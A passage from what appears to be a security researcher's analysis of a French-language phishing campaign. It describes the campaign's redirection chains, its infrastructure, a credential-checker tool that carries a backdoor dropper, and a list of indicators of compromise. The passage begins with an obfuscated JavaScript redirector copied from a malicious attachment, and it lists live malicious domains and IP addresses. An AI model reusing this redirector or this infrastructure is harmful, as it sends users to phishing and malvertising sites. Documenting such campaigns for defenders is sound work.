"\x74\x64\x32\x6E\x62\x7A\x6A\x6D\x67\x6F\x36\x73\x6E\x65\x6E\x6A\x7A\x70\x72\x2E\x70\x77",
"\x6C\x69\x70\x71\x76\x77\x78\x63\x73\x63\x34\x75\x68\x6D\x6A\x36\x74\x6D\x76\x2E\x70\x77",
"\x31\x33\x72\x7A\x61\x75\x30\x69\x64\x39\x79\x76\x37\x71\x78\x37\x76\x6D\x78\x2E\x70\x77",
"\x6B\x64\x33\x37\x68\x62\x6F\x6A\x67\x6F\x65\x76\x6F\x63\x6C\x6F\x7A\x77\x66\x2E\x70\x77",
"\x66\x75\x67\x65\x39\x69\x6F\x63\x74\x6F\x38\x39\x63\x6B\x36\x7A\x62\x30\x76\x2E\x70\x77",
"\x70\x6D\x63\x35\x6B\x71\x6C\x78\x6C\x62\x6C\x78\x30\x65\x67\x74\x63\x37\x32\x2E\x70\x77",
"\x30\x71\x38\x31\x73\x73\x72\x74\x68\x69\x72\x63\x69\x62\x70\x6A\x62\x33\x38\x2E\x70\x77","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x66\x6C\x6F\x6F\x72","\x68\x74\x74\x70\x3A\x2F\x2F","\x72\x65\x70\x6C\x61\x63\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];
var arr=[_0xa4d9[0],_0xa4d9[1],_0xa4d9[2],_0xa4d9[3],_0xa4d9[4],_0xa4d9[5],_0xa4d9[6],_0xa4d9[7],_0xa4d9[8],_0xa4d9[9],_0xa4d9[10],_0xa4d9[11],_0xa4d9[12],_0xa4d9[13],_0xa4d9[14],_0xa4d9[15],_0xa4d9[16],_0xa4d9[17],_0xa4d9[18],_0xa4d9[19],_0xa4d9[20],_0xa4d9[21],_0xa4d9[22],_0xa4d9[23],_0xa4d9[24]];
var redir=arr[Math[_0xa4d9[27]](Math[_0xa4d9[25]]()* arr[_0xa4d9[26]])];
window[_0xa4d9[30]][_0xa4d9[29]](_0xa4d9[28]+ redir)

This JavaScript code, which was part of the attachment, deobfuscates an array of [random].pw domains that redirect users to the payload domain. In this particular campaign, the payload domain changed to hxxp://email-document-joint[.]pro/redir/.
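The hex-escaped strings decode the same way in Python, which is a quick way to recover the redirect domains from the script without executing it:

```python
# First entry of the obfuscated _0xa4d9 array, kept as a raw string
# exactly as it appears in the attachment.
raw = r"\x75\x71\x76\x6B\x38\x66\x74\x75\x77\x35\x69\x74\x38\x64\x73\x67\x6C\x63\x7A\x2E\x70\x77"

# unicode_escape interprets the \xNN sequences as the characters they encode.
domain = bytes(raw, "ascii").decode("unicode_escape")
assert domain == "uqvk8ftuw5it8dsglcz.pw"
```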

However, it appears that using JavaScript code inside attachments was not a huge success: only days later, the domain deobfuscation and redirection code was moved behind pste.eu, a Pastebin-like service for HTML code. The phishing emails thereafter contained pste.eu links such as hxxps[://]pste[.]eu/p/yGqK[.]html.

In the next iteration of evolution during November, we observed a few different styles. Some emails contained links to subdomains of random .pw or .site domains such as:

  • hxxp://6NZX7M203U[.]p95jadah5you6bf1dpgm[.]pw
  • hxxp://J8EOPRBA7E[.]jeu0rgf5apd5337[.]site

At this point, .PDF files were also seen as attachments in the phishing emails. Those PDFs contained similar links to random subdomains of .site or .website domains.

A few days later, on the 15th of November, the attackers added another layer of redirection in front of the pste.eu URLs by using Twitter-shortened URLs. They used a Twitter account to post 298 pste.eu URLs and then included the t.co equivalents in their phishing emails. The Twitter account appears to be some sort of advertising account with very little activity since its creation in 2012. Most of the tweets and retweets are related to Twitter advertisement campaigns, products, lotteries, etc.

 

The pste.eu links in Twitter

 

Example of the URL redirections

The latest links used in the campaign are random .icu domains leading to a 302 redirection chain. The delivery method remains XHTML/HTML attachments or links in the emails. The campaign appears to be evolving fairly quickly, and the attackers are active in generating new domains and new ways of redirecting and obfuscating. At the time of writing, the payload URLs lead to an advertising redirection chain involving multiple domains and URLs known for malvertising.

 

Infrastructure

The campaign has mostly been observed using compromised Wanadoo email accounts, and later email accounts in the attackers’ own domains, such as rault@3130392E3130322E37322E3734.lho33cefy1g.pw, to send out the emails. The subdomain is the name of the sending email server and is a hex representation of the server’s public IP address, in this case 109.102.72.74.
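The hex-encoded subdomain decodes directly to the ASCII dotted quad:

```python
# Subdomain taken from the sender address above.
hex_name = "3130392E3130322E37322E3734"

# Each pair of hex digits is the ASCII code of one character of the IP.
ip = bytes.fromhex(hex_name).decode("ascii")
assert ip == "109.102.72.74"
```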

The server behind the .pw domain appears to be a postfix email server that is already listed on multiple blacklists. The compromised email accounts used for sending out the phishing emails always come from .fr domains.

The links in the emails go through multiple URLs in redirection chains and most of the websites are hosted in the same servers.

Following the redirections from the payload domains (e.g. email-document-joint[.]pro or the .pw payload domains) later in November, we were redirected to domains such as ffectuermoi[.]tk or eleverqualit[.]tk. These were hosted on servers alongside many similar-looking domains. Closer investigation of these servers revealed that they were known for hosting PUP/adware programs and more malvertising URLs.

Continuing to the ffectuermoi[.]tk domain eventually leads to doesok[.]top, which serves advertisements while setting cookies along the way. The servers hosting doesok[.]top are also known for hosting PUP/adware/malware.

 

Additional Find

During the investigation we came across an interesting artifact in Virustotal submitted from France. The file is a .zip archive that contained the following

  • "All in One Checker" tool – a tool that can be used to verify email account/password dumps for valid accounts/combinations
  • .vbs dropper – a script that drops a backdoor onto the user's system when the checker tool is executed
  • Directory created by the checker tool – named with the date and time of the tool's execution, containing results in these text files:
    • Error.txt – contains any errors
    • Good.txt – verified valid results
    • Ostatok.txt – "Ostatok" is Russian for "the rest" or "remainder"
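Results directories like this are easy to triage in bulk. The sketch below is hypothetical: the three file names come from the sample above, but the one-account-per-line `user@domain:password` format inside them is an assumption, and the demo data is fabricated.

```python
import pathlib
import tempfile

def summarise_results(directory):
    """Count entries per checker results file and collect sender domains."""
    summary = {}
    domains = set()
    for name in ("Error.txt", "Good.txt", "Ostatok.txt"):
        path = pathlib.Path(directory) / name
        lines = [l for l in path.read_text().splitlines() if l.strip()]
        summary[name] = len(lines)
        for line in lines:
            if "@" in line:
                # assumed "user@domain:password" layout
                domains.add(line.split("@")[1].split(":")[0])
    return summary, domains

# Demo with fabricated data (not real campaign accounts).
tmp = tempfile.mkdtemp()
pathlib.Path(tmp, "Error.txt").write_text("")
pathlib.Path(tmp, "Good.txt").write_text("user@example.fr:pass1\n")
pathlib.Path(tmp, "Ostatok.txt").write_text("other@example.fr:pass2\n")
summary, domains = summarise_results(tmp)
print(summary, domains)
```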

Contents of the .zip file. 03.10_17:55 is the directory created by the tool, containing the checker results. Both .vbs files are exactly the same backdoor dropper. The rest are configuration files and the checker tool itself.

 

Contents of the directory created by the checker tool

Almost all of the email accounts inside these .txt files are from .fr domains, and one of them is the same address we saw used as a sender in one of the phishing emails on the 19th of October. Was this tool used by the attackers behind this campaign? It seems rather fitting.

But what caused them to upload this tool, zipped together with its results, to VirusTotal?

When opening the All In One Checker tool, you are greeted with a lovely message, and pressing continue will attempt to install the backdoor.

We replaced the .vbs dropper with a Wscript.Echo() alert.

 

Hey great!

Perhaps they wanted to check the files because they accidentally infected themselves with a backdoor.

 

Indicators

This is a non-exhaustive list of indicators observed during the campaign.

2bv9npptni4u46knazx2.pw
p95jadah5you6bf1dpgm.pw
lho33cefy1g.pw
mail-server-zpqn8wcphgj.pw
http://piecejointe.pro/facture/redirect.php
http://email-document-joint.pro/redir/
l45yvbz21a.website
95plb963jjhjxd.space
sjvmrvovndqo2u.icu
jeu0rgf5apd5337.site
95.222.24.44 - Email Server
109.102.72.74 - Email Server
83.143.150.210 - Email Server
37.60.177.228 - Web Server / Malware C2
87.236.22.87 - Web Server / Malware C2
207.180.233.109 - Web Server
91.109.5.170 - Web Server
162.255.119.96 - Web Server
185.86.78.238 - Web Server
176.119.157.62 - Web Server
113.181.61.226

The following indicators have been observed but are benign and can cause false positives.

https://pste.eu
https://t.co